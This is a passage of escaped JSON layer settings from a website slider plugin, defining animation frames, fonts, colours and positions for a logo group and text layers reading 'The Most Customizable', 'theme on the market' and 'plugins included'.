To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":300,\"startRelative\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":7700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"d\":false,\"n\":false},\"type\":\"image\",\"version\":\"6.4.0\"},\"11\":{\"text\":\"Group11\",\"alias\":\"LOGO\",\"uid\":11,\"size\":{\"width\":{\"d\":{\"v\":\"900px\",\"e\":true},\"n\":{\"v\":\"900px\"},\"t\":{\"v\":\"900px\",\"e\":true},\"m\":{\"v\":\"900px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"700px\",\"e\":true},\"n\":{\"v\":\"700px\"},\"t\":{\"v\":\"700px\",\"e\":true},\"m\":{\"v\":\"700px\",\"e\":true}},\"originalWidth\":72,\"originalHeight\":72,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-100px\",\"e\":true},\"n\":{\"v\":\"-100px\"},\"t\":{\"v\":\"-140px\",\"e\":true},\"m\":{\"v\":\"-140px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":12,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"responsiveChilds\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":3000,\"start\":100,\"startRelative\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":3000,\"start\":100,\"startRelative\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":5900,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"group\",\"version\":\"6.4.0\"},\"3\":{\"text\":\"The Most Customizable\",\"alias\":\"The most\",\"uid\":3,\"size\":{\"width\":{\"d\":{\"e\":true}},\"height\":{\"d\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"10px\",\"e\":true},\"n\":{\"v\":\"10px\"},\"t\":{\"v\":\"10px\"},\"m\":{\"v\":\"10px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":13,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":13,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontSize\":{\"d\":{\"v\":\"70px\",\"e\":true},\"n\":{\"v\":\"70px\"},\"t\":{\"v\":\"70px\"},\"m\":{\"v\":\"70px\"}},\"fontWeight\":{\"d\":{\"v\":\"500\",\"e\":true},\"n\":{\"v\":\"500\"},\"t\":{\"v\":\"500\"},\"m\":{\"v\":\"500\"}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"76px\",\"e\":true},\"n\":{\"v\":\"76px\"},\"t\":{\"v\":\"76px\"},\"m\":{\"v\":\"76px\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(0, 0, 0, 1)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(0, 0, 0, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.4.0\"},\"6\":{\"text\":\"theme on the market\",\"alias\":\"Theme on...\",\"uid\":6,\"size\":{\"width\":{\"d\":{\"e\":true}},\"height\":{\"d\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"80px\",\"e\":true},\"n\":{\"v\":\"80px\"},\"t\":{\"v\":\"80px\"},\"m\":{\"v\":\"80px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":14,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":14,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontSize\":{\"d\":{\"v\":\"44px\",\"e\":true},\"n\":{\"v\":\"44px\"},\"t\":{\"v\":\"44px\"},\"m\":{\"v\":\"44px\"}},\"fontWeight\":{\"d\":{\"v\":\"500\",\"e\":true},\"n\":{\"v\":\"500\"},\"t\":{\"v\":\"500\"},\"m\":{\"v\":\"500\"}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"50px\",\"e\":true},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(0, 0, 0, 1)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(0, 0, 0, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.4.0\"},\"8\":{\"text\":\"plugins included\",\"alias\":\"Plugins included\",\"uid\":8,\"size\":{\"width\":{\"d\":{\"e\":true}},\"height\":{\"d\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\"},\"t\":{\"v\":\"16px\"},\"m\":{\"v\":\"16px\"}},\"y\":{\"d\":{\"v\":\"186px\",\"e\":true},\"n\":{\"v\":\"186px\"},\"t\":{\"v\":\"186px\"},\"m\":{\"v\":\"186px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":15,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":15,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontSize\":{\"d\":{\"v\":\"20px\",\"e\":true},\"n\":{\"v\":\"20px\"},\"t\":{\"v\":\"20px\"},\"m\":{\"v\":\"20px\"}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\"},\"t\":{\"v\":\"700\"},\"m\":{\"v\":\"700\"}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"20px\",\"e\":true},\"n\":{\"v\":\"20px\"},\"t\":{\"v\":\"20px\"},\"m\":{\"v\":\"20px\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 